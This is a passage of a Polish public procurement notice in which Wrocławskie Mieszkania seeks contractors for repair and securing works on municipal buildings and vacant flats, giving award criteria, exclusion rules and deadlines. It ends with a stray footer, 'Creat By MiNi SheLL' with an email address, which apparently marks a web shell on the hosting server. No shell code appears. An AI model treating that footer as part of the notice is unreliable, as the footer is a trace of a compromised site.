otynkowaniem od strony zewnętrznej tynkiem kategorii I wraz ze zbrojeniem prętami stalowymi o średnicy 8-12 mm co drugi bloczek,<br/>10)	Zamurowanie otworów z bloczków gazobetonowych gr 24 cm wraz z otynkowaniem od strony zewnętrznej tynkiem kategorii I wraz ze zbrojeniem prętami stalowymi o średnicy 8-12 mm co drugi bloczek,<br/>11)	Montaż drzwi zewnętrznych antywłamaniowych do lokalu,<br/>12)	Wymiana drzwi zewnętrznych na antywłamaniowe wraz z obróbką ościeży, <br/>13)	Zabezpieczenie odpadających tynków zewnętrznych (zagrażających bezpieczeństwu osób i mienia),<br/>14)	Tynk zewnętrzny zwykły kategorii pierwszej o pow. do 2m w jednym miejscu (obróbki – w szczególności w budynkach zasiedlonych),<br/>15)	Tynk zewnętrzny zwykły kategorii pierwszej o pow. do 5m w jednym miejscu (obróbki – w szczególności w budynkach zasiedlonych),<br/>16)	Naprawa lub Zabezpieczenie okienek dachowych lub wyłazów (w budynkach wysiedlonych),<br/>17)	Demontaż urządzeń sanitarnych: ustępu z miską fajansową, zlewozmywaka, umywalki,<br/>18)	Demontaż baterii zlewozmywakowej, wannowej i umywalkowej,<br/>19)	Zakorkowanie podejścia gazowego korkami o średnicy 15-20 mm,<br/>20)	Demontaż zaworu czerpalnego z zakorkowaniem podejścia o średnicy 15-20 mm.,<br/>21)	Demontaż przewodów instalacji elektrycznej z wykuciem bruzd, <br/>22)	Demontaż osprzętu modułowego,<br/>23)	Demontaż WLZ,<br/>24)	Inne prace polegające na zabezpieczeniu lokali (pustostanów), budynków niezamieszkałych, obiektów małej architektury oraz terenów zewnętrznych stanowiących własność Gminy Wrocław.<br/>6.	Wykonawca udzieli na wykonane roboty 12 miesięcznej gwarancji. Bieg terminu gwarancji rozpoczyna się w dniu następnym po zakończeniu odbioru robót. Wykonawca zobowiązany jest również przekazać Zamawiającemu dokumenty gwarancji wystawione przez producentów/sprzedawców urządzeń wmontowanych podczas realizacji umowy, o ile sam nie jest ich producentem, wraz z innymi dokumentami niezbędnymi do realizacji uprawnień wynikających z gwarancji oraz przenieść uprawnienia z tytułu rękojmi, jakie posiada wobec sprzedawców wmontowanych urządzeń.<br/>7.	Okres rękojmi dotyczący przedmiotu umowy określa się na 24 miesiące. Bieg terminu rękojmi rozpoczyna się w dniu następnym po zakończeniu odbioru robót.<br/>8.	Jeżeli przedmiot zamówienia będzie wykonywany na nieruchomościach zabudowanych zamieszkałych lub użytkowych, Wykonawca zobowiązuje się prowadzić prace z poszanowaniem miru domowego i mienia mieszkańców oraz dostępu do nieruchomości, jak również biorąc pod uwagę ciszę nocną oraz jak najmniejsze zakłócanie spokoju mieszkańców.<br/>9.	Roboty remontowe będą realizowane sukcesywnie w zależności od konieczności realizacji zleceń zgłaszanych przez Zamawiającego Wykonawcy. Każdorazowo o zakresie zlecenia decyduje Zamawiający. <br/>10.	Zamówienie określa maksymalne potrzeby Zamawiającego. Zamawiający zastrzega sobie prawo do niezrealizowania całości zamówienia. Zamawiający przewiduje, że wartość niezrealizowanych robót w trakcie trwania umowy nie przekroczy 30 % łącznej wartości zamówienia określonej w § 4 ust. 1 umowy.<br/>11.	Szczegółowy zakres obowiązków stron i opis przedmiotu zamówienia został ujęty w projektowanych postanowieniach umowy stanowiących załącznik nr 7 do SWZ.<br/>12.	Zamawiający określa wymagania związane z zatrudnianiem osób, o których mowa <br/>w art. 95 ustawy Pzp. wykonawca i podwykonawca zobowiązują się zatrudniać w trakcie realizacji umowy na podstawie stosunku pracy w sposób określony w art. 22 § 1 ustawy z 26 czerwca 1974 r. Kodeks pracy osoby do wykonywania czynności bezpośrednio związanych z realizacją zamówienia tzn. wszystkie roboty budowlane wykonywane na terenie budowy w branży budowlanej, sanitarnej i elektrycznej opisane w dokumentacji projektowej, przez cały okres wykonywania tych czynności, z wyłączeniem kierownika budowy. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 1296241,84 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <p class="mb-0">45410000-4 - Tynkowanie</p> <p class="mb-0">45421000-4 - Roboty w zakresie stolarki budowlanej</p> <p class="mb-0">45421100-5 - Instalowanie drzwi i okien, i podobnych elementów</p> <p class="mb-0">45440000-3 - Roboty malarskie i szklarskie</p> <p class="mb-0">45450000-6 - Roboty budowlane wykończeniowe, pozostałe</p> <p class="mb-0">50800000-3 - Różne usługi w zakresie napraw i konserwacji</p> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <p class="mb-0">45331000-6 - Instalowanie urządzeń grzewczych, wentylacyjnych i klimatyzacyjnych</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45311200-2 - Roboty w zakresie instalacji elektrycznych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">20 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje udzielenie zamówień, o których mowa w art. 214 ust. 1 pkt 7 ustawy Pzp.<br/>Całkowita wartość tych zamówień została uwzględniona przy obliczaniu jego wartości i wynosi do 50 % szacunkowej wartości zamówienia podstawowego dla zadania nr 1 i 2. Ewentualny zakres powyższych zamówień może dotyczyć całego zakresu zamówienia podstawowego. Zamówienia podobne, zostaną udzielone na warunkach określonych w umowie podstawowej. Wykonawca przed zawarciem umowy zobowiązany będzie złożyć oświadczenie, o którym mowa w art. 125 ust. 1 ustawy Pzp w zakresie nie szerszym niż wskazane w postępowaniu o udzielenie zamówienia podstawowego.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">95</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Kryterium społeczne tj. zatrudnienie do realizacji zamówienia bezrobotnych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">5</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">. W odniesieniu do przesłanek wykluczenia wykonawcy z postępowania, określonych w art. 108 ust. 1 ustawy Pzp lub w art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego, Zamawiający oceni brak podstaw wykluczenia Wykonawcy oraz podmiotów, na których zasoby wykonawca powołuje się na zasadach określonych w art. 118 ustawy pzp, na podstawie oświadczenia, o którym mowa w art. 125 ust. 1 ustawy Pzp, składanego wraz z ofertą (wzór - odpowiednio załączniki nr 2 do SWZ). Zamawiający nie żąda od wykonawcy informacji, dotyczących podwykonawców niebędących podmiotami udostępniającymi zasoby na zasadach określonych w art. 118 ustawy Pzp, potwierdzających, że nie zachodzą wobec tych podwykonawców podstawy wykluczenia z postępowania.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia (konsorcjum). W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Wszelka korespondencja będzie prowadzona wyłącznie z pełnomocnikiem.<br/>2. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców (m.in. konsorcjum, spółka cywilna) oświadczenie z art. 125 ust. 1 ustawy Pzp, składa odrębnie i podpisuje każdy spośród wykonawców wspólnie ubiegających się o udzielenie zamówienia. Oświadczenie to potwierdza brak podstaw wykluczenia wykonawcy oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3. Oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia zgodne z art. 117 ust. 4 ustawy Pzp składane jest wraz z ofertą.<br/>4. Każdy Wykonawca oraz Wykonawcy wspólnie ubiegający się o udzielenie zamówienia (np. konsorcjum, spółka cywilna) mogą złożyć tylko jedną ofertę, zgodnie z wymaganiami określonymi w SWZ. Złożenie przez jednego Wykonawcę oraz Wykonawców wspólnie ubiegających się o udzielenie zamówienia więcej niż jednej oferty lub oferty zawierającej rozwiązania alternatywne spowoduje ich odrzucenie.<br/>5. Jeżeli zostanie wybrana oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia, zamawiający będzie żądał przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych wykonawców, w której m.in. zostanie określony pełnomocnik uprawniony do kontaktów z zamawiającym oraz do wystawiania dokumentów związanych z płatnościami, przy czym termin, na jaki została zawarta umowa, nie może być krótszy niż termin realizacji zamówienia.<br/>6. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców (m.in. konsorcjum, spółka cywilna): Oświadczenia składane w celu potwierdzenia braku podstaw do wykluczenia oraz potwierdzenia spełniania warunków udziału w postępowaniu o którym mowa w art. 125 ust.1 ustawy Pzp, składa i podpisuje każdy z wykonawców wspólnie ubiegających się o zamówienie lub wyznaczony Pełnomocnik. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> wskazane w projektowanych postanowieniach umowy stanowiących załącznik nr 3 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-03-20 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://wroclawskiemieszkania.ezamawiajacy.pl/pn/WROCMIE/demand/196596/notice/public/details</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-03-20 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-04-18</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> I. Wrocławskie Mieszkania Sp. z o.o. z siedzibą przy ul. Namysłowskiej 8, 50-304 Wrocław, tel. 71 323 57 00, adres strony internetowej: www.wm.wroc.pl reprezentujące na podstawie pełnomocnictwa Prezydenta Wrocławia Nr 31/I/Z/19 z dnia 12 września 2019 r. Gminę Wrocław, Plac Nowy Targ 1-8, 50-141 Wrocław.<br/>II. Szczegółowe informacje dot. warunków udziału, podstaw wykluczenia oraz oświadczeń i dokumentów potwierdzających udziału w postępowaniu oraz braku podstaw wykluczenia są określone w SWZ.<br/>III. Zamawiający wykluczy z postępowania Wykonawców, wobec których zachodzą podstawy wykluczenia, o których mowa w art. 108 ust. 1 ustawy Pzp. oraz art. 7 ust. 1 ustawy o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego z zastrzeżeniem art. 110 ust. 2 ustawy Pzp.<br/>IV. Ofertę oraz oświadczenie z art. 125 ust. 1 ustawy Pzp składa się pod rygorem nieważności w formie elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/>V. Wykonawca dołącza do oferty:<br/>1) Formularz ofertowy (załącznik nr 1 do SWZ)<br/>2) 3) Oświadczenie z art. 125 ust.1 ustawy Pzp o niepodleganiu wykluczeniu (wzór załącznik nr 2 do SWZ) w zakresie wskazanym w SWZ.<br/>4) KRS/ CEiDG ( jeśli dotyczy)<br/>5) Pełnomocnictwo (jeżeli dotyczy)<br/>5) 6) Oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia zgodne<br/>z art. 117 ust. 4 ustawy Pzp (załącznik nr 4 do SWZ) (jeżeli dotyczy ).<br/>7) Pełnomocnictwo ustanowione przez wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>8) Wykaz rozwiązań równoważnych (jeżeli dotyczy)<br/>8) Zastrzeżenie tajemnicy przedsiębiorstwa (jeżeli dotyczy)<br/>VI. Zamawiający nie wymaga wniesienia WADIUM.<br/>VII. Zamawiający przewiduje możliwość udzielenia zamówień polegających na powtórzeniu podobnych rodzajowo zamówień, zgodnych z przedmiotem zamówienia podstawowego o których mowa w art. 214 ust. 1 pkt 7 ustawy Prawo zamówień publicznych, w wysokości do 50 % szacunkowej wartości zamówienia podstawowego dla zadania nr 1 i 2. Ewentualny zakres powyższych zamówień może dotyczyć całego zakresu zamówienia podstawowego. Zamówienia podobne, zostaną udzielone na warunkach określonych w umowie podstawowej. Wykonawca przed zawarciem umowy zobowiązany będzie złożyć oświadczenie, o którym mowa w art. 125 ust. 1 ustawy Pzp w zakresie nie szerszym niż wskazane w postępowaniu o udzielenie zamówienia podstawowego.<br/>VIII. Zamawiający wymaga wpłaty zabezpieczenia należytego wykonania umowy 1% ceny całkowitej (brutto) podanej w ofercie dla każdego zadania.<br/>Wykonawca w przypadku jakichkolwiek wątpliwości związanych z zasadami korzystania z Platformy, Wykonawca winien skontaktować się z dostawcą rozwiązania teleinformatycznego Platforma zakupowa https:/wroclawskiemieszkania.ezamawiajacy.pl tel. +48 22 257 22 23 (infolinia dostępna w dni robocze, w godzinach 9.00-17.00) e-mail: oneplace@marketplanet.pl<br/>IX. Niezbędne wymagania sprzętowo-aplikacyjnych umożliwiających korzystanie z Platformy – Rozdz. XIV SWZ.<br/>X. Osobą uprawnioną do porozumiewania się z Wykonawcami w sprawach związanych z procedurą postępowania o udzielenie zamówienia jest p. Anna Nagórek-Muzyka; nr tel. 71 323 57 17.<br/>W korespondencji kierowanej do Zamawiającego Wykonawcy powinni posługiwać się numerem postępowania.

Creat By MiNi SheLL
Email: jattceo@gmail.com